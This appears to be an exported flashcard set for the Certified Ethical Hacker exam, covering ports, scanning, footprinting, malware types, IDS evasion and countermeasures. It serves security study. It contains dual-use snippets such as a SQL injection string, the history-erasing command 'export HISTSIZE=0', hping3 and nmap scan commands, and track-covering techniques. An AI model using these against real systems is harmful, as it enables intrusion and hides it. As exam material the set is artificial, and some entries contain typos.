Your company implements a demilitarized zone (DMZ) to isolate publicly available servers. The security engineer implements the following rule on the firewall that protects and isolates the DMZ: Permit 10.1.1.12 192.168.2.0/24 TCP/UDP Port 3389 What does this rule do? A)It will allow the internal computer with an address of 10.1.1.12 to use RDP to communicate with all the devices that use IP addresses in the 192.168.2.0 - 192.168.2.255 range. B)It will allow the internal computer with an address of 10.1.1.12 to use SNMP to communicate with the device with an address of 192.168.2.0. C)It will allow the internal computer with an address of 10.1.1.12 to use SNMP to communicate with all the devices that use IP addresses in the 192.168.2.0 - 192.168.2.255 range. D)It will allow the internal computer with an address of 10.1.1.12 to use RDP to communicate with the device with an address of 192.168.2.0.
B)Identify if computer files have been changed
Your company regularly uses MD5 hashing on their file server. What is the purpose? A)Capture all communication with the file server B)Identify if computer files have been changed C)Detect any intrusions on the file server D)Prevent any intrusions on the file server
802.11n
can run upward of 150 Mbps
OpManager
is a network monitoring software that offers advanced fault and performance management functionality across critical IT resources such as routers, WAN links, switches, firewalls, VoIP call paths, physical servers, etc.
Simple Service Discovery Protocol (SSDP)
is a network protocol that works in conjunction with UPnP to detect plug and play devices available in a network
Spam Mimic
is a spam/email steganography tool that encodes the secret message into an innocent looking spam emails
Shoulder Surfing
is a technique, where attackers secretly observes the target to gain critical information
FOCA (Fingerprinting Organizations with Collected Archives)
is a tool used mainly to find metadata and hidden information in the documents its scans
Social engineering
is an art of exploiting human behaviour to extract configential information
XMAS
is so named because all flags are turned on.
ethical hacker
is someone who employs the same tools and techniques a criminal might use, with the customer's full support and approval, to help secure a network or system.
phreaker
is someone who manipulates telecommunication systems in order to make free calls.
PsList
list detailed information about processes
basically just run a reverse DNS lookup on all IPs in the subnet.
list scan
cyberterrorist
motivated by religious or political beliefs to create fear and large scale systems disruption
Web spiders
perform automated searches on the target website and collect specified information such as employee names, email addresses, etc.
Angry IP Scanner
pings each IP address to check if it's alive, then optionally resolves its hostname, determines the MAC address, scans ports, etc
Registered ports
port numbers 1024 - 49,151
/etc/passwd
where can the UID (User ID) and GID (Group ID) be found on a Linux machine?
Scanning Methodology
Check for Live Systems Check for Open Ports Scanning Beyond IDS Banner Grabbing Scan for Vulnerability Draw Network Diagrams Prepare Proxies Scanning Pen Testing
provide compatibility
Windows Application Compatibility Framework, shim is used to ___ between the older and newer versions of Windows operating system
B)Receive incoming syslog messages
Recently, you decided to open UDP port 514 on your company's firewall. What is the purpose of this action? A)Receive network time protocol messages B)Receive incoming syslog messages C)Allow users to access computers using rlogin D)Receive SNMP packets
TCP/UDP 162
SNMP Trap
Telnet request to port 25
What would the below output represent? 220 mailserver.domain.com Microsoft ESMTP MAIL Service, Version: 5.0.2195.5329 ready at Sat, 29 Jan 2011 11:29:14 +0200
D) Sigverif
Which built in Windows tool can be used to check the integrity of digitally signed critical files from Microsoft? A) Sc B) Netstat C) Msconfig D) Sigverif
D. Single Quote
Which character is the best choice to start a SQL injection attempt? A. Colon B. Semicolon C. Double Quote D. Single Quote
C)Preventative
Which class of control is smart card authentication? A)Prescriptive B)Corrective C)Preventative D)Detective
SSL
Which common web transport protocol can be used to evade an IDS and tunnel malicious content?
D)Switches
Which device is susceptible to MAC flood attacks? A)Hubs B)Routers C)Firewalls D)Switches
B)GLBA
Which of the following addresses the collection and disclosure of customers' personal financial information by financial institutions? A)HIPAA B)GLBA C)SOX D)FISMA
C) PKI
Which of the following are NOT components of a Kerberos system? A) KDC B) AD C) PKI D) TGS E) TGT
Meltdown Vulnerability
-Attackers may take advantage of this vulnerability to escalate privileges by forcing an unprivileged process to read other adjacent memory locations such as kernel memory and physical memory -This leads to revealing of critical system information such as credentials, private keys, etc.
Spectre Vulnerability
-Attackers may take advantage of this vulnerability to read adjacent memory locations of a process and access information for which he/she is not authorized -Using this vulnerability an attacker can even read the kernel memory or perform a web based attack using JavaScript
LOCAL_SYSEM
Which Windows security context is a hacker operating from if the hacker can spawn a shell after a successful buffer overflow attack?
A)Iris
Which biometric scan focuses on the colored portion of the user's eye? A)Iris B)Retina C)Facial recognition D)Corneal
promiscuous mode
A configuration of a network card that makes the card pass all traffic it receives to the central processing unit rather than just frames addressed to it -- a feature normally used for packet sniffing and bridged networking for hardware virtualization. Windows machines use WinPcap for this ; Linux uses libpcap.
ICMP Type 4
A congestion control message.
C) 128
A Windows Server 2000 machine uses Syskey as an additional security step in regard to password protection. How many bits does Syskey use for encryption? A) 40 B) 64 C) 128 D) 256
promiscuous
A ___ policy is basically wide open.
Paranoid
A ___ policy locks everything down, not even allowing the user to open so much as an Internet browser.
Prudent
A ___ policy, which provides maximum security but allows some potentially and known dangerous services because of business needs.
Authentication header (AH)
An Internet Protocol Security (IPSec) header to verify that the contents of a packet have not been modified while the packet was in transit.
brute-force password attack
A method of password cracking whereby all possible options are systematically enumerated until a match is found. These attacks try every password (or authentication option), one after another, until successful.
Intranet Zone
A controlled zone that has little-to-no heavy restrictions.
B)set type=mx
A hacker is using nslookup in interactive mode to query Domain Name Service (DNS). The hacker specifically wants to discover the mail server records for your network. What should the hacker type into the command shell to request the appropriate records? A)locate type=ns B)set type=mx C)locate type=mx D)set type=ns
D)Hacktivist
A hacker was recently caught trying to deface the web site of a company with which he had serious disagreement concerning their use of certain chemicals in their products. What is this type of hacker called? A)Ethical hacker B)White hat C)Cracker D)Hacktivist
Biometrics
A measurable, physical characteristic used to recognize the identity, or verify the claimed identity, of an applicant.
Production Network Zone (PNZ)
A very restricted zone that strictly controls direct access from uncontrolled zones.
TCP
An SYN attack uses which protocol?
Challenge Handshake Authentication Protocol (CHAP)
An authentication method on point-to-point links, using a three-way handshake and a mutually agreed-upon key.
certificate
An electronic file used to verify a user's identity, providing nonrepudiation throughout the system. It is also a set of data that uniquely identifies an entity. Contain the entity's public key, serial number, version, subject, algorithm type, issuer, valid dates, and key usage details.
Burp Suite Firebug Website Informer
Analyzing a website from afar can show information such as software in use, OS, filenames, paths, and contact details, what tools can you use to gather this information?
B)getElementsByTagName() C)getElementById()
Another member of your security team is confused about cross-site scripting (XSS) attacks. You explain how phishing attempts can use XSS to replace existing content on the webpage. She decides to write a simple JavaScript XSS defacement function. Which document object method(s) should you suggest she use? (Choose all that apply.) A)adoptNode() B)getElementsByTagName() C)getElementById() D)importNode() E)open() F)renameNode() G)write()
B)IDS
As an ethical hacker, you are using Nmap port scanning and must try to evade a certain type of device. You are using the following techniques: Break the network scans up into smaller ranges, with delays in between each scan. Break up IP packets into fragments. Which type of device are you most likely attempting to evade? A)Firewall B)IDS C)Router D)NAC
document all the findings
At the end of pen testing ______.
permission
Ethical hackers performs security assessment of their organization with the _____ of concerned authorities
-U
Hping sets the URG flag
hides the messages in ASCII text
In white space steganography, user ___ by adding white spaces to the end of the lines
Proxy Switcher
What tool hides your IP address from the websites you visit?
TCPTROJAN
Which of the following is not a trojan? A) BO2K B) LOKI C) Subseven D) TCPTROJAN
ALE
___ is the product of the annual rate of occurrence (ARO) and the single loss expectancy (SLE).
network activity
Necurs monitors and filters ___ and has been observed to send spam and install rogue security software
<1D> GROUP
NetBIOS code and type for Master browser for the subnet.
<20> UNIQUE
NetBIOS code and type for Server service running
<03> UNIQUE
NetBIOS code and type for Service running on the system.
HTTPS (TCP)
Port number 443
SMB (TCP)
Port number 445
Syslog
Port number 514
DNS (TCP, UDP)
Port number 53
Internet Printing Protocol
Port number 631
DHCP (UDP)
Port number 67
"export HISTSIZE=0"
Attackers can use ___ command to delete the command history and the specific command they used to hide log files
bypass firewall rules logging mechanism
Attackers use stealth scanning techniques to ___ and hide themselves as usual network traffic
social engineering
Attackers use this metadata and hidden information in order to perfork ___ and other attacks
ICMP echo and ICMP reply
Attackers uses ICMP tunneling technique to use ____ packets as a carrier of TCP payload, to access or control a system stealthily
live hosts on the network services type of packet filters/firewalls operating systems OS versions
Attackers uses Nmap to extract information such as __ (application name and version), __, __
privileged user accounts
Attackers using these exploits can access ___ and credentials
application-level attacks
Attacks on the actual programming code of an application.
Shrink-wrap code attacks
Attacks that take advantage of the built-in code and scripts most off-the-shelf applications come with.
something you know (user ID and password) something you have (smart card or token) something you are (biometrics)
Authentication measures are categorized by ___, ___, ___.
This flag signifies an ordered close to communications.
FIN (Finish)
Port is open (Xmas scan)
FIN + URG + PUSH --> <-- No Response
Port is closed (Xmas scan)
FIN + URG + PUSH --> <-- RST
TCP Session Termination
FIN --> <-- ACK <-- FIN ACK -->
RFC 793-based
FIN scan works only with OSes with __ TCP/IP implementation
Layer 7 Application
FTP, HTTP, SMTP, Etc resides at what layer of the OSI model?
appending a dot (.)
Files in UNIX can be hidden just by ___ in front of a file name
- Search for the target company's external URL in a search engine - Sub-domains provide an insight into different departments and business units in an organization - You may find a company's sub domains by trial and error method or using a service such as netcraft - You can use Sublist3r python script that enumerates subdomains across multiple sources at once
Finding Company's Top-level Domains (TLDs) and Sub-domains
Know Security Posture
Footprinting allows attackers to know the external security posture of the target organization
as the process of gathering information on computer systems and networks.
Footprinting is defined as:
first step, publicly available sensitive information
Footprinting is the ____ of any attack on information systems; attackers gathers _____ , using which he/she performs social engineering, system and network attacks, etc. that leads to huge financial loss of business reputation
- Prevent DNS record retrieval from publically available servers - Prevent information leakage - Prevent social engineering attemps
Footprinting pen testing helps organization to:
D. EAL (Evaluation Assurance Level)
Four terms make up the Common Criteria process. Which of the following contains seven levels used to rate the target? A. ToE B. ST C. PP D. EAL
Using Reverse HTTP Shells Using Reverse ICMP Tunnels Using DNS Tunneling Using TCP Parameters
Four ways to Covering Tracks on Network
competitive intelligence
Freely and readily available information on an organization that can be gathered by a business entity about its competitor's customers, products, and marketing. It can be used by an attacker to build useful information for further attacks.
C. 217.88.53.154
From the partial e-mail header provided, which of the following represents the true originator of the e-mail message? Return-path: <[email protected]> Delivery-date: Wed, 13 Apr 2011 00:31:13 +0200 Received: from mailexchanger.anotherbiz.com([220.15.10.254]) by mailserver.anotherbiz.com running ExIM with esmtp id xxxxxx-xxxxxx-xxx; Wed, 13 Apr 2011 01:39:23 +0200 Received: from mailserver.anybiz.com ([158.190.50.254] helo=mailserver.anybiz.com) by mailexchanger.anotherbiz.com with esmtp id xxxxxx-xxxxxx-xx for [email protected]; Wed, 13 Apr 2011 01:39:23 +0200 Receved: from SOMEONEComputer [217.88.53.154] (helo=[SOMEONEcomputer]) by mailserver.anybiz.com with esmtpa (Exim x.xx) (envelope-from <[email protected]) id xxxxx-xxxxxx-xxxx for [email protected]; Tue, 12 Apr 2011 20:36:08 -0100 Message-ID: <[email protected]> Date: Tue, 12 Apr 2011 20:36:01 -0100 X-Mailer: Mail Client From: SOMEONE Name<[email protected]> To: USERJOE Name<[email protected]> Subject: Something to consider ... A. 220.15.10.254 B. 158.190.50.254 C. 217.88.53.154 D. The e-mail header does not show this information
B) The CAM table of the switch will overflow, causing the switch to broadcast all packets received
Frustrated by the inability to sniff traffic on a switch, an attacker sends thousands of ARP messages through the switch. What is trying to accomplish? A) The MAC address pairings on the computer will become confused B) The CAM table of the switch will overflow, causing the switch to broadcast all packets received C) The CAM table will set up false MAC address to port matches, resulting in mis-delivery of packets D) The CAM table will overflow, forcing the switch to reboot
www.alexa.com
company's online reputation (as well as the company's efforts to control it) and the actual traffic statistics of the company's web traffic can be found where?
Teardrop
custom fragmented packets
Sarbanes-Oxley (SOX)
was created to make corporate disclosures more accurate and reliable in order to protect the public and investors from shady behavior.
execute malicious programs
Attackers can use this technique to ___ at system startup, maintain persistence, perform remote execution, escalate privileges, etc.
network topology trusted routers firewall locations
Attackers conduct traceroute to extract information about: _______
inject malicious script
Attackers create web shells to ___ on a web server to maintain persistent access and escalate privileges
Shrink Wrap Code Attacks
Attackers exploit default configuration and settings of the off-the-shelf libraries and code
steal critical system information such as credentials, secret keys
Attackers exploit these vulnerabilities to gain unauthorized access and ___, etc. stored in the application's memory to escalate privileges
SecurityFocus Exploit Database
Attackers search for an exploit based on the OS and software application on exploit sites such as ___, ___
gain access to a system
Attackers search for vulnerabilities in an operating system's design, installation or configuration and exploit them to ______
TCP probe packets with ACK flag
Attackers send ___ set to a remote device and then analyzes the header information (TTL and WINDOW field) of received RST packets to find whether the port is open or closed
TCP probe packets
Attackers send ___ with a TCP flag (FIN, URG, PSH) set or with no flags, no response means port is open and RST means the port is closed
Netcat (Banner Grabbing)
This utility reads and writes data across network connections, using the TCP/IP protocol
Launchd
___ is used in MacOS and OS X boot up to complete the system initialization process by loading parameters for each launch-on-demand system-level daemon
D) Hactivism
_____ occurs when a hacker performs attacks because of political motivation A) Black hat hacking B) Gray box attacks C) Black box attacks D) Hactivism
Banner Grabbing
_____ or OS fingerprinting is the method to determine the operating system running on a remote target system.
port is filtered port is not filtered
Attackers send an ACK probe packet with random sequence number, no response means ___ (stateful firewall is present) and RST response means the ___
inventory of live systems
Attackers then use ping sweep to create an ____ in the subnet
Port Scanning Countermeasures
1) Configure firewall and IDS to detect and block probes 2) Run the port scanning tools against hosts on the network to determine whether the firewall properly detects the port scanning activity 3) Ensure that mechanism used for routing and filtering at the routers and firewalls respectively cannot be bypasses using particular source ports or source-routing methods 4) Ensure that the router, IDS, and firewall firmware are updated to their latest releases 5) Use custom rule set to lock down the network and block unwanted ports at the firewall 6) Filter all ICMP messages (i.e. inbound ICMP message types and outbound ICMP type 3 unreachable messages) at the firewalls and routers 7) Perform TCP and UDP scanning along with ICMP probes against your organization's IP address space to check the network configuration and its available ports 8) Ensure that the anti scanning and anti spoofing rules are configured
Banner Grabbing Countermeasures: Disabling or Changing Banner
1) Display false banners to misguide attackers 2) Turn off unnecessary services on the network host to limit the information disclosure 3) Use ServerMask (http://www.port80software.com) tools to disable or change banner information 4) Apache 2.x with mod_headers module - use a directive in httpd.conf file to change banner information Header set Server "New Server Name" 5) Alternatively, change the ServerSignature line to ServerSignature Off in httpd.conf file
Banner Grabbing Countermeasures: Hiding File Extensions from Web Pages
1) File extensions reveal information about the underlying server technology that an attacker can utilize to launch attacks 2) Hide file extensions to mask the web technology 3) Change application mappings such as .asp with .htm or .foo, etc. to disguise the identity of the servers 4) Apache users can use mod_negotiation directives 5) IIS users use tools such as PageXchanger to manage the file extensions
IP Identification Number
1) Send probe to host of suspect spoofed traffic that triggers reply and compare IP ID with suspect traffic 2) If IP IDs are not in the near value of packet being checked, suspect traffic is spoofed 3) This technique is successful even if the attacker is in the same subnet
IDS Evasion Techniques
1) Use fragmented IP packets 2) Spoof your IP address when launching attacks and sniff responses from server 3) Use source routing (if possible) 4) Connect to proxy servers or compromised trojaned machines to launch attacks
Proxy Chaining
1) User requests a resource from the destination 2) Proxy client at the user's system connects to a proxy server and passes the request to proxy server 3) The proxy server strips the user's identification information and passes the request to next proxy server 4) This process is repeated by all the proxy servers in the chain 5) At the end unencrypted request is passed to the web server
Access control list (ACL)
A method of defining what rights and permissions an entity has to a given resource.
penetration testing
A method of evaluating the security of a computer system or network by simulating an attack from a malicious source.
daisy chaining
A method of external testing whereby several systems or resources are used together to make an attack.
CNAME record
A Canonical Name record within DNS, used to provide an alias for a domain name.
A. Scanning
A Certified Ethical Hacker (CEH) follows a specific methodology for testing a system. Which step comes after footprinting in the CEH methodology? A. Scanning B. Enumeration C. Reconnaissance D. Application attack
acknowledgment (ACK)
A TCP flag notifying an originating station that the preceding packet (or packets) has been received
Permissive
A ___ policy blocks only things that are known to be naughty or dangerous.
reverse DNS resolution
A ____ is carried out to identify the host names doing a List Scan
daemon
A background process found in Unix, Linux, Solaris, and other Unix-based operating systems.
cold site
A backup facility with the electrical and physical components of a computer facility, but with no computer equipment in place. The site is ready to receive the necessary replacement computer equipment in the event the user has to move from his main computing location to an alternate site.
cloning
A cell phone attack in which the serial number from one cell phone is copied to another in an effort to copy the cell phone.
A) Anomaly based
A client asks you about intrusion detection systems. They want a system that dynamically learns traffic patterns and alerts on abnormal traffic. Which IDS would you recommend? A) Anomaly based B) Pattern based C) Signature based D) None of the above
D. Configure server side input validation on all web forms
A client is concerned about web server security. In addition to taking steps against buffer overflows on several web applications, the clients wants to mitigate against cross site scripting from the web front ends. Which of the following would be the best choice to assist in this? A. Perform a vulnerability scan using NESSUS B. Perform a penetration test like scan against the server using Metasploit C. Ensure only the Apache web server is in use D. Configure server side input validation on all web forms
A. Buffer Overflow
A client's web application appears to have an excessive number of GETS. Which attack is this software potentially susceptible to? A. Buffer Overflow B. Brute Force C. SQL Injection D. Parameter Tampering
community cloud
A cloud model where the infrastructure is shared by several organizations, usually with the same policy and compliance considerations.
ad hoc mode
A mode of operation in a wireless LAN in which clients send data directly to one another without utilizing a wireless access point (WAP), much like a point-to-point wired connection.
B. An ACK scan using hping3 on port 80 for a group of addresses
A colleague enters the following command: root@mybox: # hping3 -A 192.168.2.x -p 80 What is being attempted here? A. An ACK scan using hping3 on port 80 for a single address B. An ACK scan using hping3 on port 80 for a group of addresses C. Address validation using hping3 on port 80 for a single address D. Address validation using hping3 on port 80 for a group of addresses
D. The search engine will respond with only those pages having the word intranet in the title and URL and with human resources in the text.
A colleague enters the following into a Google search string: intitle:intranet inurl:intranet:+intext:"human resources" Which of the following is most correct concerning this attempt? A. The search engine will not respond with any result because you cannot combine Google hacks in one line. B. The search engine will respond with all pages having the word intranet in their title and human resources in the URL. C. The search engine will respond with all pages having the word intranet in the title and in the URL. D. The search engine will respond with only those pages having the word intranet in the title and URL and with human resources in the text.
archive
A collection of historical records or the place where they are kept. In computing, an ___ generally refers to backup copies of logs and/or data.
Telnet for banner grabbing
A common method of performing banner grabbing is to use a simple tool already built into most operating systems, ____.
B. Ensuring there are no A records for internal hosts on the public-facing name server
A company has a publicly facing web application. Its internal intranet-facing servers are separated and protected by a firewall. Which of the following choices would be helpful in protecting against unwanted enumeration? A. Allowing zone transfers to ANY B. Ensuring there are no A records for internal hosts on the public-facing name server C. Changing the preference number on all MX records to zero D. Not allowing any DNS query to the public-facing name server
C)DNS zone transfer enumeration
A company hosts a public web application and an internal Intranet protected by a firewall. All DNS queries go through a single DNS server. Due to security concerns, your company deployed a second internal DNS server. You remove all the internal A resource records from the old DNS server and configure it to only communicate with external entities using an external DNS zone. The new internal DNS server contains only the internal zone with internal resource records. What should this countermeasure protect against? A)DNS hijacking B)DNS cache poisoning C)DNS zone transfer enumeration D)DoS attacks
crossover error rate (CER)
A comparison metric for different biometric devices and technologies; the point at which the false acceptance rate (FAR) equals the false rejection rate (FRR). As an identification device becomes more sensitive or accurate, its FAR decreases while its FRR increases. Is the point at which these two rates are equal, or cross over.
buffer overflow
A condition that occurs when more data is written to a buffer that it has space to store, which results in data corruption or other system errors. This is usually because of insufficient bounds checking, a bug, or improper configuration in the program code.
A)Social engineering
A customer receives an unsolicited call from a known software company. The person on the other end requires the customer to verify their user credentials over the phone. Which term describes this type of hacking? A)Social engineering B)Tailgating C)Soft skills D)Gumshoeing
cracker
A cyberattacker who acts without permission from, and gives no prior notice to, the resource owner. This is also known as a malicious hacker.
D)Maps out the tables within the database is trying to exploit
A database administrator contacts you regarding the database he administers. He is concerned that an attacker is using database fingerprinting. What does this do? A)Attempts to run SQL statements B)Causes the SQL database to shut down C)Provides information about the server on which the database resides D)Maps out the tables within the database is trying to exploit
Script kiddie
A derogatory term used to describe an attacker, usually new to the field, who uses simple, easy-to-follow scripts or programs developed by others to attack computer systems and networks and deface websites.
Anonymizer
A device or service designed to obfuscate traffic between a client and the Internet. It is generally used to make activity on the Internet as untraceable as possible.
Suicide hacker
A hacker who aims to bring down critical infrastructure for a "cause" and does not worry about the penalties associated with his actions.
Backdoor
A hidden capability in a system or program for bypassing normal computer authentication systems.
Time and date Actions Events
A logic bomb is activated by which of the following? A) Time and date B) Vulnerability C) Actions D) Events
B. An external threat can take advantage of the misconfigured X-server vulnerability. D. An internal threat can take advantage of the misconfigured X-server vulnerability
A machine in your environment uses an open X-server to allow remote access. The X-server access control is disabled, allowing connections from almost anywhere and with little to no authentication measures. Which of the following are true statements regarding this situation? (Choose all that apply.) A. An external vulnerability can take advantage of the misconfigured X-server threat. B. An external threat can take advantage of the misconfigured X-server vulnerability. C. An internal vulnerability can take advantage of the misconfigured X-server threat. D. An internal threat can take advantage of the misconfigured X-server vulnerability
unsolicited SYN/ACK
A machine that receives an ___ packet will respond with an RST. An unsolicited RST will be ignored
Mandatory access control (MAC)
A means of restricting access to system resources based on the sensitivity (as represented by a label) of the information contained in the system resource and the formal authorization (that is, clearance) of users to access information of such sensitivity.
Annualized loss expectancy (ALE)
A measurement of the cost of an asset's value to the organization and the monetary loss that can be expected for an asset due to risk over a one-year period.
B. False negatives
A network and security administrator installs an NIDS. After a few weeks, a successful intrusion into the network occurs and a check of the NIDS during the timeframe of the attack shows no alerts. An investigation shows the NIDS was not configured correctly and therefore did not trigger on what should have been attack alert signatures. Which of the following best describes the actions of the NIDS? A. False positives B. False negatives C. True positives D. True negatives
D) Python
A new network administrator is asked to schedule daily scans of systems throughout the enterprise. Which of the following programming languages has an OSI-approved open source license and is commonly used for accomplishing this goal? A) ASP.NET B) PHP C) C# D) Python
B) The team is practicing passive footprinting D) The team is gathering competitive intelligence
A pen test team starts a particular effort by visiting the company's website, a team member goes to social networking sites and job boards looking for information and building a profile on the organization. Which of the following statements are true regarding these efforts? (Choose two) A) The team is practicing active footprinting B) The team is practicing passive footprinting C) The team is gathering sensitive information that should be protected D) The team is gathering competitive intelligence
D) Running the command sid2user S-1-5-21-861567501-1383384898-839522115-500 will return the name of the true administrator account
A penetration test team member is running user2sid commands on a machine. After entering the command: User2sid \\218.55.62.3 guest, She receives an output of: S-1-5-21-861567501-1383384898-839522115-501 Which of the following is true regarding this output? A) Running the command sid2user S-1-5-21-861567501-1383384898-839522115-501 will return the name of the true administrator account B) Running the command sid2user S-1-5-21-861567500-1383384898-839522115-501 will return the name of the true administrator account C) Running the command sid2user S-1-5-21-861567501-1383384898-500-501 will return the name of the true administrator account D) Running the command sid2user S-1-5-21-861567501-1383384898-839522115-500 will return the name of the true administrator account
A. The background web application used the first record it could find in the table
A penetration tester finds a web application offering an error message with an entry area for an e-mail account. The penetration test enters ' or '1'='1 into the field and presses <ENTER>. A message appears stating "Your login information has been mailed to [email protected]. What is the likely reason for this? A. The background web application used the first record it could find in the table B. The background web application used a random record from the table C. The background web application has crashed D. The background web application is now stuck in a loop
D) Cain
A penetration tester has gained access to a .pcf file. Which of the following tools could be useful in decoding passwords embedded in the file? A) Nessus B) Nmap C) John the Ripper D) Cain
A. Create a route statement within the meterpreter
A penetration tester is using Metasploit to attack an FTP server. He wants to attack to use the FTP server as a launching point to "pivot" to an internal LAN segment. Which of the following should be accomplished to perform the attack? A. Create a route statement within the meterpreter B. Set payload action in the meterpreter to propogate C. Choose the pivot exploit D. Set network configuration parameters to reconfigure in the meterpreter
A)Data-mining techniques
A programmer from your company contacts you regarding a possible security breach. During the discussion, he asks you to identify and investigate unauthorized transactions. What should you use to provide him with this information? A)Data-mining techniques B)Reconnaissance C)Footprinting D)Banner grabbing
Bluetooth
A proprietary, open, wireless technology used for transferring data from fixed and mobile devices over short distances.
Address Resolution Protocol (ARP)
A protocol used to map a known IP address to a physical (MAC) address. It is defined in RFC 826.
URL imbedding
A public use workstation contains the browsing history of multiple users who logged in during the last seven days. WHile digging through the history, a user runs across the following web address: www.snaz33enu.com/&w25/session-22525
Audit trail
A record showing which user has accessed a given resource and what operations the user performed during a given period.
tailgaiting
A security cameras picks up someone who doesn't work at the company following closely behind ab employee while they enter the building. What type of attack is taking place?
It will scan all of the hosts on the 192.168.1.0, 192.168.2.0, 192.168.3.0, 192.168.4.0 and 192.168.5.0 subnets.
A security engineer runs the following Nmap command: nmap -sn -PE 192.168.1-5 What are the results of this scan? A)It will scan the first five hosts on the 192.168.1.0, 192.168.2.0, 192.168.3.0, 192.168.4.0 and 192.168.5.0 subnets. B)It will scan all hosts on the 192.168.1.0 subnet. C)It will scan the first host on the 192.168.1.0, 192.168.2.0, 192.168.3.0, 192.168.4.0 and 192.168.5.0 subnets. D)It will scan all of the hosts on the 192.168.1.0, 192.168.2.0, 192.168.3.0, 192.168.4.0 and 192.168.5.0 subnets.
confidentiality
A security objective that ensures a resource can be accessed only by authorized users. This is also the security principle that stipulates sensitive information is not disclosed to unauthorized individuals, entities, or processes.
A. The attacker took advantage of a zero-day vulnerability on the machine.
A security peer is confused about a recent incident. An attacker successfully accessed a machine in the organization and made off with some sensitive data. A full vulnerability scan was run immediately following the theft, and nothing was discovered. Which of the following best describes what may have happened? A. The attacker took advantage of a zero-day vulnerability on the machine. B. The attacker performed a full rebuild of the machine after he was done. C. The attacker performed a denial-of-service attack. D. Security measures on the device were completely disabled before the attack began.
C. Ensure that any remaining risk is residual or low and accept the risk.
A security team is implementing various security controls across the organization. After several configurations and applications, a final agreed-on set of security controls are put into place; however, not all risks are mitigated by the controls. Of the following, which is the next best step? A. Continue applying controls until all risk is eliminated. B. Ignore any remaining risk as "best effort controlled." C. Ensure that any remaining risk is residual or low and accept the risk. D. Remove all controls.
500
A simple scanning for ISAKMP at UDP port ___ can indicate the presence of a VPN gateway
computer-based attack
A social engineering attack using computer resources such as e-mail and IRC
bug
A software or hardware defect that often results in system vulnerabilities.
Algorithm
A step-by-step method of solving a problem.
cache
A storage buffer that transparently stores data so future requests for the same data can be served faster.
community string
A string used for authentication in SNMP
block cipher
A symmetric key cryptographic algorithm that transforms a block of information at a time using a cryptographic key.
Blowfish
A symmetric, block-cipher data-encryption standard that uses a variable-length key that can range from 32 bits to 448 bits.
C)Location anonymity
A systems administrator reports to you that an attacker used a TOR proxy to carry out an attack against your network. What does this proxy provide to the attacker? A)Payload obscurity B)Packet fragmentation C)Location anonymity D)Overlapping fragments
B. The attacker will see message 2.
A target machine (with a MAC of 12:34:56:AB:CD:EF) is connected to a switch port. An attacker (with a MAC of 78:91:00:ED:BC:A1) is attached to a separate port on the same switch with a packet capture running. There is no spanning of ports or port security in place. Two packets leave the target machine. Message 1 has a destination MAC of E1:22:BA:87:AC:12. Message 2 has a destination MAC of FF:FF:FF:FF:FF:FF. Which of the following statements is true regarding the messages being sent? A. The attacker will see message 1. B. The attacker will see message 2. C. The attacker will see both messages. D. The attacker will see neither messages.
A. --script D. -sC
A team member is using nmap and asks about the "scripting engine" in the tool. Which option switches can be used to invoke the nmap scripting engine? (Choose two.) A. --script B. -z C. -sA D. -sC
B. It displays the NetBIOS name cache.
A team member issues the nbtstat.exe -c command. Which of the following best represents the intent of the command? A. It displays the IP route table for the machine. B. It displays the NetBIOS name cache. C. It displays active and inactive services. D. It puts a NIC into promiscuous mode for sniffing.
A)String formatting C)Buffer overflow E)Code injection F)Thread racing
A team of developers is creating mobile apps that target Apple iOS devices. Which of the following vulnerabilities should they address when using Objective-C? (Choose all that apply.) A)String formatting B)Memory corruption C)Buffer overflow D)Log injection E)Code injection F)Thread racing G)Access control H)Type confusion
cookie
A text file stored within a browser by a web server that maintains information about the connection. Are used to store information to maintain a unique but consistent surfing experience but can also contain authentication parameters. Can be encrypted and have defined expiration dates.
B. User input is not sanitized, which can potentially be exploited
A user forgets her password to a website, and the web application asks her to enter her email to have the password emailed to her. She enters her email as a [email protected]. The application displays a server error. What is most likely wrong with the web application? A. Nothing. The email is not valid and this is normal respons B. User input is not sanitized, which can potentially be exploited C. The web server installation has poor privilege control D. The application uses a back end database
D) 5 minutes
A user has chosen a 22 character password is that straight out of a dictionary. Approximately how long will it take to crack the password? A) 50 years B) 22 years C) 15 days D) 5 minutes
D. Cross site scripting
A user receives an e-mail with a link to an interesting forum. She clicks the link and is taken to a web based bulletin board; however, additional functions are carried out in the background under her user privileges. The functions allow the attacker access to information used on the BBS, even though no executables are downloaded and run on the user's machine. Which of the following best describes this attack? A. Backdoor B. Trapdoor C. Denial of Service D. Cross site scripting
cryptographic key
A value used to control cryptographic operations, such as decryption, encryption, signature generation, and signature verification.
D) Display pop-ups
A virus does not do which of the following? A) Replicate with user interaction B) Change configuration settings C) Exploit vulnerabilities D) Display pop-ups
boot sector virus
A virus that plants itself in a system's boot sector and infects the master boot record.
B. The password is never sent in clear text over the network
A web administrator chooses Digest authentication over Basic authentication on her website Why is Digest authentication considered more secure than Basic authentication? A. Basic authentication uses single factor B. The password is never sent in clear text over the network C. The password is sent in clear text over the network but is never reused D. It uses Kerberos
B. The firewall doesn't protect against port 80 or port 443
A web server sits behind a firewall and offers HTTP and HTTPS access to a website and web applications. External users access the server for various web applications. Which of the following is true regarding the protection offered by the firewall? A. The firewall can detect malicious traffic will halt attacks B. The firewall doesn't protect against port 80 or port 443 C. If properly configured, a firewall is the only protection needed to safeguard the server D. Authentication methods configured at the firewall can halt most attacks
Access point (AP)
A wireless LAN device that acts as a central point for all wireless traffic.
802.11i
A wireless LAN security standard developed by IEEE. Requires Temporal Key Integrity Protocol (TKIP) and Advanced Encryption Standard (AES)
A. PTR B. MX D. SOA F. A
A zone file consists of which records? (Choose all that apply.) A. PTR B. MX C. SN D. SOA E. DNS F. A G. AX
-TTL based ACK flag probe scanning or -WINDOW based ACK flag probe scanning
ACK Probe Packets --> <-- RST
Layer 6 Presentation
AFP, NCP, MIME, Etc resides at what layer of the OSI model?
Asia and the Pacific
APNIC manages what areas?
Canada, many Caribbean and North Atlantic islands, and the United States.
ARIN manages what areas?
Layer 2 Data Link
ARP, CDP, PPP, Etc. resides at what layer of the OSI model?
D)Create and enforce a physical security policy for remote employees.
